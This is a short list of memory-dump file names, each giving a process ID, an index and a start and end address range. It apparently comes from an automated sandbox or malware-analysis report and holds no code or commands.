memory/4772-2277-0x00007FF77FE40000-0x00007FF780236000-memory.dmp

memory/3628-2279-0x00007FF716CB0000-0x00007FF7170A6000-memory.dmp

memory/4168-2278-0x00007FF635F40000-0x00007FF636336000-memory.dmp

memory/640-2280-0x00007FF6BF710000-0x00007FF6BFB06000-memory.dmp

memory/3220-2282-0x00007FF70E190000-0x00007FF70E586000-memory.dmp

memory/5108-2283-0x00007FF6B51A0000-0x00007FF6B5596000-memory.dmp

memory/408-2284-0x00007FF7EFF00000-0x00007FF7F02F6000-memory.dmp

memory/5080-2281-0x00007FF77DBB0000-0x00007FF77DFA6000-memory.dmp

memory/4592-2289-0x00007FF6B5770000-0x00007FF6B5B66000-memory.dmp

memory/2392-2287-0x00007FF7721F0000-0x00007FF7725E6000-memory.dmp

memory/3804-2286-0x00007FF6DF640000-0x00007FF6DFA36000-memory.dmp

memory/4928-2288-0x00007FF629F50000-0x00007FF62A346000-memory.dmp

memory/1140-2285-0x00007FF74E260000-0x00007FF74E656000-memory.dmp